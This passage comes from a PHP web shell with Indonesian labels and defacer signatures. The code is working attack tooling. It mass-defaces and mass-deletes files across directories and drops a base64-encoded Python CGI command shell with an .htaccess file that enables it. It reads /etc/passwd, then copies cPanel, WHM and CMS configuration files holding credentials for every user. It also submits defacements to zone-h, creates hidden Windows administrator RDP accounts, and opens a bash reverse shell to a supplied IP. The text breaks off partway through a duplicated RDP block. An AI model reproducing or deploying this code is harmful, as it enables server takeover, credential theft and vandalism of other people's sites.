  737.                 } elseif($dirb === '..') {
  738.                     file_put_contents($lokasi, $isi_script);
  739.                 } else {
  740.                     if(is_dir($dirc)) {
  741.                         if(is_writable($dirc)) {
  742.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
  743.                             file_put_contents($lokasi, $isi_script);
  744.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  745.                         }
  746.                     }
  747.                 }
  748.             }
  749.         }
  750.     }
  751.     if($_POST['mass'] == 'onedir') {
  752.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  753.         $ini="http://";
  754.         $mainpath=$_POST[d_dir];
  755.         $file=$_POST[d_file];
  756.         $path=opendir("$mainpath");
  757.         $code=base64_encode($_POST[script]);
  758.         $indx=base64_decode($code);
  759.         while($row=readdir($dir)){
  760.         $start=@fopen("$row/$file","w+");
  761.         $finish=@fwrite($start,$indx);
  762.         if ($finish){
  763.             echo"$ini$row/$file\n";
  764.             }
  765.         }
  766.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  767.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  768.         $path=opendir("$mainpath");
  769.         $code=base64_encode($_POST[script]);
  770.         $indx=base64_decode($code);
  771.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  772.         $finish=@fwrite($start,$indx);
  773.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  774.         }
  775.  
  776.     }
  777.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  778.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  779.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  780.     elseif($_POST['mass'] == 'massdeface') {
  781.         echo "<div style='margin: 5px auto; padding: 5px'>";
  782.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  783.         echo "</div>";  }
  784.     else {
  785.         echo "
  786.         <center><font style='text-decoration: underline;'>
  787.         Select Type:<br>
  788.         </font>
  789.         <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
  790.         <option value=\"onedir\">Mass Deface 1 Dir</option>
  791.         <option value=\"massdeface\">Mass Deface ALL Dir</option>
  792.         <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  793.         <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  794.         <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  795.         <font style='text-decoration: underline;'>Folder:</font><br>
  796.         <input type='text' name='d_dir' value='$path' style='width: 450px;' height='10'><br>
  797.         <font style='text-decoration: underline;'>Filename:</font><br>
  798.         <input type='text' name='d_file' value='ngeue.php' style='width: 450px;' height='10'><br>
  799.         <font style='text-decoration: underline;'>Index File:</font><br>
  800.         <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Rinto AR</textarea><br>
  801.         <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  802.         </form></center>";
  803.         }
  804. }
  805.  elseif($_GET['c'] == 'cgi2') {
  806.     $cgi_dir = mkdir('rabbitz_cgi', 0755);
  807.         chdir('rabbitz_cgi');
  808.     $file_cgi = "cgi2.rabbitz";
  809.         $memeg = ".htaccess";
  810.     $isi_htcgi = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .rabbitz \n AddHandler cgi-script .rabbitz \n AddHandler cgi-script .rabbitz";
  811.     $htcgi = fopen(".htaccess", "w");
  812.     $cgi_script = "";
  813.     $cgi = fopen($file_cgi, "w");
  814.     fwrite($cgi, base64_decode($cgi_script));
  815.     fwrite($htcgi, $isi_htcgi);
  816.     chmod($file_cgi, 0755);
  817.         chmod($memeg, 0755);
  818.     echo "<br><center>Done ... <a href='rabbitz_cgi/cgi2.rabbitz' target='_blank'>Klik Here</a>";
  819. } elseif($_GET['c'] == 'cgipy') {
  820.     $cgi_dir = mkdir('rabbitz_cgi', 0755);
  821.         chdir('rabbitz_cgi');
  822.     $file_cgi = "cgipy.rabbitz";
  823.         $memeg = ".htaccess";
  824.     $isi_htcgi = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .rabbitz \n AddHandler cgi-script .rabbitz \n AddHandler cgi-script .rabbitz";
  825.     $htcgi = fopen(".htaccess", "w");
  826.     $cgi_script = "IyEvdXNyL2Jpbi9weXRob24NCiMgMDctMDctMDQNCiMgdjEuMC4wDQoNCiMgY2dpLXNoZWxsLnB5DQojIEEgc2ltcGxlIENHSSB0aGF0IGV4ZWN1dGVzIGFyYml0cmFyeSBzaGVsbCBjb21tYW5kcy4NCg0KDQojIENvcHlyaWdodCBNaWNoYWVsIEZvb3JkDQojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQgcmVsaWNlbnNlIHRoaXMgY29kZS4NCg0KIyBObyB3YXJyYW50eSBleHByZXNzIG9yIGltcGxpZWQgZm9yIHRoZSBhY2N1cmFjeSwgZml0bmVzcyB0byBwdXJwb3NlIG9yIG90aGVyd2lzZSBmb3IgdGhpcyBjb2RlLi4uLg0KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISENCg0KIyBFLW1haWwgbWljaGFlbCBBVCBmb29yZCBET1QgbWUgRE9UIHVrDQojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsvYXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbA0KDQoiIiINCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8gZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLg0KIiIiDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojIEltcG9ydHMNCnRyeToNCiAgICBpbXBvcnQgY2dpdGI7IGNnaXRiLmVuYWJsZSgpDQpleGNlcHQ6DQogICAgcGFzcw0KaW1wb3J0IHN5cywgY2dpLCBvcw0Kc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQNCmZyb20gdGltZSBpbXBvcnQgc3RyZnRpbWUNCmltcG9ydCB0cmFjZWJhY2sNCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPDQpmcm9tIHRyYWNlYmFjayBpbXBvcnQgcHJpbnRfZXhjDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiMgY29uc3RhbnRzDQoNCmZvbnRsaW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQtc2l6ZToxMnB0OyI+Jw0KdmVyc2lvbnN0cmluZyA9ICdWZXJzaW9uIDEuMC4wIDd0aCBKdWx5IDIwMDQnDQoNCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToNCiAgICBzY3JpcHRuYW1lID0gb3MuZW52aXJvblsiU0NSSVBUX05BTUUiXQ0KZWxzZToNCiAgICBzY3JpcHRuYW1lID0gIiINCg0KTUVUSE9EID0gJyJQT1NUIicNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBQcml2YXRlIGZ1bmN0aW9ucyBhbmQgdmFyaWFibGVzDQoNCmRlZiBnZXRmb3JtKHZhbHVlbGlzdCwgdGhlZm9ybSwgbm90cHJlc2VudD0nJyk6DQogICAgIiIiVGhpcyBmdW5jdGlvbiwgZ2l2ZW4gYSBDR0kgZm9ybSwgZXh0cmFjdHMgdGhlIGRhdGEgZnJvbSBpdCwgYmFzZWQgb24NCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFsdWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLg0KICAgIChlLmcuIHRvIHJldHVybiBOb25lIHNvIHlvdSBjYW4gdGVzdCBmb3IgbWlzc2luZyBrZXl3b3JkcyAtIHdoZXJlICcnIGlzIGEgdmFsaWQgYW5zd2VyIGJ1dCB0byBoYXZlIHRoZSBmaWVsZCBtaXNzaW5nIGlzbid0LikiIiINCiAgICBkYXRhID0ge30NCiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0Og0KICAgICAgICBpZiBub3QgdGhlZm9ybS5oYXNfa2V5KGZpZWxkKToNCiAgICAgICAgICAgIGRhdGFbZmllbGRdID0gbm90cHJlc2VudA0KICAgICAgICBlbHNlOg0KICAgICAgICAgICAgaWYgIHR5cGUodGhlZm9ybVtmaWVsZF0pICE9IHR5cGUoW10pOg0KICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdGhlZm9ybVtmaWVsZF0udmFsdWUNCiAgICAgICAgICAgIGVsc2U6DQogICAgICAgICAgICAgICAgdmFsdWVzID0gbWFwKGxhbWJkYSB4OiB4LnZhbHVlLCB0aGVmb3JtW2ZpZWxkXSkgICAgICMgYWxsb3dzIGZvciBsaXN0IHR5cGUgdmFsdWVzDQogICAgICAgICAgICAgICAgZGF0YVtmaWVsZF0gPSB2YWx1ZXMNCiAgICByZXR1cm4gZGF0YQ0KDQoNCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1zaGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+DQo8Qk9EWT48Q0VOVEVSPg0KPEgxPldlbGNvbWUgdG8gY2dpLXNoZWxsLnB5IC0gPEJSPmEgUHl0aG9uIENHSTwvSDE+DQo8Qj48ST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPg0KIiIiK2ZvbnRsaW5lICsiVmVyc2lvbiA6ICIgKyB2ZXJzaW9uc3RyaW5nICsgIiIiLCBSdW5uaW5nIG9uIDogIiIiICsgc3RyZnRpbWUoJyVJOiVNICVwLCAlQSAlZCAlQiwgJVknKSsnLjwvQ0VOVEVSPjxCUj4nDQoNCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIgQ29tbWFuZDwvSDI+DQo8Rk9STSBNRVRIT0Q9XCIiIiIgKyBNRVRIT0QgKyAnIiBhY3Rpb249IicgKyBzY3JpcHRuYW1lICsgIiIiXCI+DQo8aW5wdXQgbmFtZT1jbWQgdHlwZT10ZXh0PjxCUj4NCjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+DQo8L0ZPUk0+PEJSPjxCUj4iIiINCmJvZHllbmQgPSAnPC9CT0RZPjwvSFRNTD4nDQplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5nIFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBtYWluIGJvZHkgb2YgdGhlIHNjcmlwdA0KDQppZiBfX25hbWVfXyA9PSAnX19tYWluX18nOg0KICAgIHByaW50ICJDb250ZW50LXR5cGU6IHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyDQogICAgcHJpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICMgc28gaXMgdGhpcyBibGFuayBsaW5lDQogICAgZm9ybSA9IGNnaS5GaWVsZFN0b3JhZ2UoKQ0KICAgIGRhdGEgPSBnZXRmb3JtKFsnY21kJ10sZm9ybSkNCiAgICB0aGVjbWQgPSBkYXRhWydjbWQnXQ0KICAgIHByaW50IHRoZWZvcm1oZWFkDQogICAgcHJpbnQgdGhlZm9ybQ0KICAgIGlmIHRoZWNtZDoNCiAgICAgICAgcHJpbnQgJzxIUj48QlI+PEJSPicNCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJSPicNCiAgICAgICAgcHJpbnQgJ1Jlc3VsdCA6IDxCUj48QlI+Jw0KICAgICAgICB0cnk6DQogICAgICAgICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkNCiAgICAgICAgICAgIGNoaWxkX3N0ZGluLmNsb3NlKCkNCiAgICAgICAgICAgIHJlc3VsdCA9IGNoaWxkX3N0ZG91dC5yZWFkKCkNCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpDQogICAgICAgICAgICBwcmludCByZXN1bHQucmVwbGFjZSgnXG4nLCAnPEJSPicpDQoNCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlvbiwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNvbW1hbmQNCiAgICAgICAgICAgIHByaW50IGVycm9ybWVzcw0KICAgICAgICAgICAgZiA9IFN0cmluZ0lPKCkNCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpDQogICAgICAgICAgICBhID0gZi5nZXR2YWx1ZSgpLnNwbGl0bGluZXMoKQ0KICAgICAgICAgICAgZm9yIGxpbmUgaW4gYToNCiAgICAgICAgICAgICAgICBwcmludCBsaW5lDQoNCiAgICBwcmludCBib2R5ZW5kDQoNCg0KIiIiDQpUT0RPL0lTU1VFUw0KDQoNCg0KQ0hBTkdFTE9HDQoNCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wDQpBIHZlcnkgYmFzaWMgc3lzdGVtIGZvciBleGVjdXRpbmcgc2hlbGwgY29tbWFuZHMuDQpJIG1heSBleHBhbmQgaXQgaW50byBhIHByb3BlciAnZW52aXJvbm1lbnQnIHdpdGggc2Vzc2lvbiBwZXJzaXN0ZW5jZS4uLg0KIiIi";
  827.     $cgi = fopen($file_cgi, "w");
  828.     fwrite($cgi, base64_decode($cgi_script));
  829.     fwrite($htcgi, $isi_htcgi);
  830.     chmod($file_cgi, 0755);
  831.         chmod($memeg, 0755);
  832.     echo "<br><center>Done ... <a href='rabbitz_cgi/cgipy.rabbitz' target='_blank'>Klik Here</a>";
  833. }
  834. elseif ($_GET['config'] == 'configv2') {
  835.                                                         if ($_POST) {
  836.                                                             $passwd = $_POST['passwd'];
  837.                                                             mkdir("noname_config", 0777);
  838.                                                             $isi_htc = "Options all
  839. Require None
  840. Satisfy Any";
  841.                                                             $htc = fopen("noname_config/.htaccess", "w");
  842.                                                             fwrite($htc, $isi_htc);
  843.                                                             preg_match_all('/(.*?):x:/', $passwd, $user_config);
  844.                                                             foreach ($user_config[1] as $user_noname) {
  845.                                                                 $user_config_dir = "/home/$user_noname/public_html/";
  846.                                                                 if (is_readable($user_config_dir)) {
  847.                                                                     $grab_config = array("/home/$user_noname/.my.cnf" => "cpanel", "/home/$user_noname/.accesshash" => "WHM-accesshash", "/home/$user_noname/public_html/bw-configs/config.ini" => "BosWeb", "/home/$user_noname/public_html/config/koneksi.php" => "Lokomedia", "/home/$user_noname/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home/$user_noname/public_html/clientarea/configuration.php" => "WHMCS", "/home/$user_noname/public_html/whm/configuration.php" => "WHMCS", "/home/$user_noname/public_html/whmcs/configuration.php" => "WHMCS", "/home/$user_noname/public_html/forum/config.php" => "phpBB", "/home/$user_noname/public_html/sites/default/settings.php" => "Drupal", "/home/$user_noname/public_html/config/settings.inc.php" => "PrestaShop", "/home/$user_noname/public_html/app/etc/local.xml" => "Magento", "/home/$user_noname/public_html/joomla/configuration.php" => "Joomla", "/home/$user_noname/public_html/configuration.php" => "Joomla", "/home/$user_noname/public_html/wp/wp-config.php" => "WordPress", "/home/$user_noname/public_html/wordpress/wp-config.php" => "WordPress", "/home/$user_noname/public_html/wp-config.php" => "WordPress", "/home/$user_noname/public_html/admin/config.php" => "OpenCart", "/home/$user_noname/public_html/slconfig.php" => "Sitelok", "/home/$user_noname/public_html/application/config/database.php" => "Ellislab", "/home1/$user_noname/.my.cnf" => "cpanel", "/home1/$user_noname/.accesshash" => "WHM-accesshash", "/home1/$user_noname/public_html/bw-configs/config.ini" => "BosWeb", "/home1/$user_noname/public_html/config/koneksi.php" => "Lokomedia", "/home1/$user_noname/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home1/$user_noname/public_html/clientarea/configuration.php" => "WHMCS", "/home1/$user_noname/public_html/whm/configuration.php" => "WHMCS", "/home1/$user_noname/public_html/whmcs/configuration.php" => "WHMCS", "/home1/$user_noname/public_html/forum/config.php" => "phpBB", "/home1/$user_noname/public_html/sites/default/settings.php" => "Drupal", "/home1/$user_noname/public_html/config/settings.inc.php" => "PrestaShop", "/home1/$user_noname/public_html/app/etc/local.xml" => "Magento", "/home1/$user_noname/public_html/joomla/configuration.php" => "Joomla", "/home1/$user_noname/public_html/configuration.php" => "Joomla", "/home1/$user_noname/public_html/wp/wp-config.php" => "WordPress", "/home1/$user_noname/public_html/wordpress/wp-config.php" => "WordPress", "/home1/$user_noname/public_html/wp-config.php" => "WordPress", "/home1/$user_noname/public_html/admin/config.php" => "OpenCart", "/home1/$user_noname/public_html/slconfig.php" => "Sitelok", "/home1/$user_noname/public_html/application/config/database.php" => "Ellislab", "/home2/$user_noname/.my.cnf" => "cpanel", "/home2/$user_noname/.accesshash" => "WHM-accesshash", "/home2/$user_noname/public_html/bw-configs/config.ini" => "BosWeb", "/home2/$user_noname/public_html/config/koneksi.php" => "Lokomedia", "/home2/$user_noname/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home2/$user_noname/public_html/clientarea/configuration.php" => "WHMCS", "/home2/$user_noname/public_html/whm/configuration.php" => "WHMCS", "/home2/$user_noname/public_html/whmcs/configuration.php" => "WHMCS", "/home2/$user_noname/public_html/forum/config.php" => "phpBB", "/home2/$user_noname/public_html/sites/default/settings.php" => "Drupal", "/home2/$user_noname/public_html/config/settings.inc.php" => "PrestaShop", "/home2/$user_noname/public_html/app/etc/local.xml" => "Magento", "/home2/$user_noname/public_html/joomla/configuration.php" => "Joomla", "/home2/$user_noname/public_html/configuration.php" => "Joomla", "/home2/$user_noname/public_html/wp/wp-config.php" => "WordPress", "/home2/$user_noname/public_html/wordpress/wp-config.php" => "WordPress", "/home2/$user_noname/public_html/wp-config.php" => "WordPress", "/home2/$user_noname/public_html/admin/config.php" => "OpenCart", "/home2/$user_noname/public_html/slconfig.php" => "Sitelok", "/home2/$user_noname/public_html/application/config/database.php" => "Ellislab", "/home3/$user_noname/.my.cnf" => "cpanel", "/home3/$user_noname/.accesshash" => "WHM-accesshash", "/home3/$user_noname/public_html/bw-configs/config.ini" => "BosWeb", "/home3/$user_noname/public_html/config/koneksi.php" => "Lokomedia", "/home3/$user_noname/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home3/$user_noname/public_html/clientarea/configuration.php" => "WHMCS", "/home3/$user_noname/public_html/whm/configuration.php" => "WHMCS", "/home3/$user_noname/public_html/whmcs/configuration.php" => "WHMCS", "/home3/$user_noname/public_html/forum/config.php" => "phpBB", "/home3/$user_noname/public_html/sites/default/settings.php" => "Drupal", "/home3/$user_noname/public_html/config/settings.inc.php" => "PrestaShop", "/home3/$user_noname/public_html/app/etc/local.xml" => "Magento", "/home3/$user_noname/public_html/joomla/configuration.php" => "Joomla", "/home3/$user_noname/public_html/configuration.php" => "Joomla", "/home3/$user_noname/public_html/wp/wp-config.php" => "WordPress", "/home3/$user_noname/public_html/wordpress/wp-config.php" => "WordPress", "/home3/$user_noname/public_html/wp-config.php" => "WordPress", "/home3/$user_noname/public_html/admin/config.php" => "OpenCart", "/home3/$user_noname/public_html/slconfig.php" => "Sitelok", "/home3/$user_noname/public_html/application/config/database.php" => "Ellislab");
  848.                                                                     foreach ($grab_config as $config => $nama_config) {
  849.                                                                         $ambil_config = file_get_contents($config);
  850.                                                                         if ($ambil_config == '') {
  851.                                                                         } else {
  852.                                                                             $file_config = fopen("noname_config/$user_noname-$nama_config.txt", "w");
  853.                                                                             fputs($file_config, $ambil_config);
  854.                                                                         }
  855.                                                                     }
  856.                                                                 }
  857.                                                             }
  858.                                                             echo "<center><a href='?dir=$dir/noname_config'><font color=lime>Done</font></a></center>";
  859.                                                         } else {
  860.                                                             echo "<form method=\"post\" action=\"\"><center>etc/passw ( Error ? <a href='?dir=$dir&c=passwbypass'>Bypass Here</a> )<br><textarea name=\"passwd\" class='area' rows='15' cols='60'>
  861. ";
  862.                                                             echo file_get_contents('/etc/passwd');
  863.                                                             echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>
  864. ";
  865.                                                         }
  866.                                                     }elseif($_GET['mirror'] == 'zoneh') {
  867.     if($_POST['submit']) {
  868.         $domain = explode("\r\n", $_POST['url']);
  869.         $nick =  $_POST['nick'];
  870.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  871.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  872.         foreach($domain as $url) {
  873.             $zoneh = zoneh($url,$nick);
  874.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  875.                 echo "$url -> <font color=lime>OK</font><br>";
  876.             } else {
  877.                 echo "$url -> <font color=red>ERROR</font><br>";
  878.             }
  879.         }
  880.     } else {
  881.         echo "<center><form method='post'>
  882.         <u>Defacer</u>: <br>
  883.         <input type='text' name='nick' size='50' value='M4L1KL8590X'><br>
  884.         <u>Domains</u>: <br>
  885.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  886.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  887.         </form>";
  888.     }
  889.     echo "</center>";
  890. }
  891.  
  892. elseif($_GET['c'] == 'krdp_shell') {
  893.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  894.         if($_POST['create']) {
  895.             $user = htmlspecialchars($_POST['user']);
  896.             $pass = htmlspecialchars($_POST['pass']);
  897.             if(preg_match("/$user/", exe("net user"))) {
  898.                 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
  899.             } else {
  900.                 $add_user   = exe("net user $user $pass /add");
  901.                 $add_groups1 = exe("net localgroup Administrators $user /add");
  902.                 $add_groups2 = exe("net localgroup Administrator $user /add");
  903.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
  904.                 echo "[ RDP ACCOUNT INFO ]<br>
  905.                 ------------------------------<br>
  906.                 IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font><br>
  907.                 Username: <font color=lime>$user</font><br>
  908.                 Password: <font color=lime>$pass</font><br>
  909.                 ------------------------------<br><br>
  910.                 [ STATUS ]<br>
  911.                 ------------------------------<br>
  912.                 ";
  913.                 if($add_user) {
  914.                     echo "[add user] -> <font color='lime'>Berhasil</font><br>";
  915.                 } else {
  916.                     echo "[add user] -> <font color='red'>Gagal</font><br>";
  917.                 }
  918.                 if($add_groups1) {
  919.                     echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
  920.                 } elseif($add_groups2) {
  921.                     echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
  922.                 } elseif($add_groups3) {
  923.                     echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
  924.                 } else {
  925.                     echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  926.                 }
  927.                 echo "------------------------------<br>";
  928.             }
  929.         } elseif($_POST['s_opsi']) {
  930.             $user = htmlspecialchars($_POST['r_user']);
  931.             if($_POST['opsi'] == '1') {
  932.                 $cek = exe("net user $user");
  933.                 echo "Checking username <font color=lime>$user</font> ....... ";
  934.                 if(preg_match("/$user/", $cek)) {
  935.                     echo "[ <font color=lime>Sudah ada</font> ]<br>
  936.                     ------------------------------<br><br>
  937.                     <pre>$cek</pre>";
  938.                 } else {
  939.                     echo "[ <font color=red>belum ada</font> ]";
  940.                 }
  941.             } elseif($_POST['opsi'] == '2') {
  942.                 $cek = exe("net user $user 3rr0r");
  943.                 if(preg_match("/$user/", exe("net user"))) {
  944.                     echo "[change password: <font color=lime>3rr0r</font>] -> ";
  945.                     if($cek) {
  946.                         echo "<font color=lime>Berhasil</font>";
  947.                     } else {
  948.                         echo "<font color=red>Gagal</font>";
  949.                     }
  950.                 } else {
  951.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  952.                 }
  953.             } elseif($_POST['opsi'] == '3') {
  954.                 $cek = exe("net user $user /DELETE");
  955.                 if(preg_match("/$user/", exe("net user"))) {
  956.                     echo "[remove user: <font color=lime>$user</font>] -> ";
  957.                     if($cek) {
  958.                         echo "<font color=lime>Berhasil</font>";
  959.                     } else {
  960.                         echo "<font color=red>Gagal</font>";
  961.                     }
  962.                 } else {
  963.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  964.                 }
  965.             } else {
  966.                 //
  967.             }
  968.         } else {
  969.             echo "-- Create RDP --<br>
  970.             <form method='post'>
  971.             <input type='text' name='user' placeholder='username' value='3rr0r' required>
  972.             <input type='text' name='pass' placeholder='password' value='3rr0r' required>
  973.             <input type='submit' name='create' value='>>'>
  974.             </form>
  975.             -- Option --<br>
  976.             <form method='post'>
  977.             <input type='text' name='r_user' placeholder='username' required>
  978.             <select name='opsi'>
  979.             <option value='1'>Cek Username</option>
  980.             <option value='2'>Ubah Password</option>
  981.             <option value='3'>Hapus Username</option>
  982.             </select>
  983.             <input type='submit' name='s_opsi' value='>>'>
  984.             </form>
  985.             ";
  986.         }
  987.     } else {
  988.         echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  989.     }
  990. } elseif($_GET['c'] == 'network') {
  991.     echo "<center><form method='post'>
  992.     Back Connect: <br>
  993.     <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'><br>
  994.     <input type='text' placeholder='port' name='port_bc' value='6969'><br>
  995.     <input type='submit' name='sub_bc' value='Reverse' style='width: 210px;'>
  996.     </form>";
  997.     if(isset($_POST['sub_bc'])) {
  998.         $ip = $_POST['ip_bc'];
  999.         $port = $_POST['port_bc'];
  1000.         exe("/bin/bash -i >& /dev/tcp/$ip/$port 0>&1");
  1001.     }
  1002.     echo "</center>";
  1003. } elseif($_GET['c'] == 'krdp_shell') {
  1004.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  1005.         if($_POST['create']) {
  1006.             $user = htmlspecialchars($_POST['user']);
  1007.             $pass = htmlspecialchars($_POST['pass']);
  1008.             if(preg_match("/$user/", exe("net user"))) {
  1009.                 echo "[INFO] -> <font color=red>user <font color=blue>$user</font> sudah ada</font>";
  1010.             } else {
  1011.                 $add_user   = exe("net user $user $pass /add");
  1012.                 $add_groups1 = exe("net localgroup Administrators $user /add");
  1013.                 $add_groups2 = exe("net localgroup Administrator $user /add");
  1014.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
  1015.                 echo "[ RDP ACCOUNT INFO ]<br>
  1016.                 ------------------------------<br>
  1017.                 IP: <font color=blue>".gethostbyname($_SERVER['HTTP_HOST'])."</font><br>
  1018.                 Username: <font color=blue>$user</font><br>
  1019.                 Password: <font color=blue>$pass</font><br>
  1020.                 ------------------------------<br><br>
  1021.                 [ STATUS ]<br>
  1022.                 ------------------------------<br>
  1023.                 ";
  1024.                 if($add_user) {
  1025.                     echo "[add user] -> <font color='blue'>Berhasil</font><br>";
  1026.                 } else {
  1027.                     echo "[add user] -> <font color='red'>Gagal</font><br>";
  1028.                 }
  1029.                 if($add_groups1) {
  1030.                     echo "[add localgroup Administrators] -> <font color='blue'>Berhasil</font><br>";
  1031.                 } elseif($add_groups2) {
  1032.                     echo "[add localgroup Administrator] -> <font color='blue'>Berhasil</font><br>";
  1033.                 } elseif($add_groups3) {
  1034.                     echo "[add localgroup Administrateur] -> <font color='blue'>Berhasil</font><br>";
  1035.                 } else {
  1036.                     echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  1037.                 }
  1038.                 echo "------------------------------<br>";
  1039.             }
  1040.         } elseif($_POST['s_opsi']) {
  1041.             $user = htmlspecialchars($_POST['r_user']);
  1042.             if($_POST['opsi'] == '1') {
  1043.                 $cek = exe("net user $user");
  1044.                 echo "Checking username <font color=blue>$user</font> ....... ";
  1045.                 if(preg_match("/$user/", $cek)) {
  1046.                     echo "[ <font color=blue>Sudah ada</font> ]<br>
  1047.                     ------------------------------<br><br>
  1048.                     <pre>$cek</pre>";
  1049.                 } else {
  1050.                     echo "[ <font color=red>belum ada</font> ]";
  1051.                 }
  1052.             } elseif($_POST['opsi'] == '2') {
  1053.                 $cek = exe("net user $user Shun403");
  1054.                 if(preg_match("/$user/", exe("net user"))) {
  1055.                     echo "[change password: <font color=blue>Shun403</font>] -> ";
  1056.                     if($cek) {
  1057.                         echo "<font color=blue>Berhasil</font>";
  1058.                     } else {
  1059.                         echo "<font color=red>Gagal</font>";
  1060.                     }
  1061.                 } else {
  1062.                     echo "[INFO] -> <font color=red>user <font color=blue>$user</font> belum ada</font>";
  1063.                 }
  1064.             } elseif($_POST['opsi'] == '3') {
  1065.                 $cek = exe("net user $user /DELETE");
  1066.                 if(preg_match("/$user/", exe("net user"))) {
  1067.                     echo "[remove user: <font color=blue>$user</font>] -> ";
  1068.                     if($cek) {
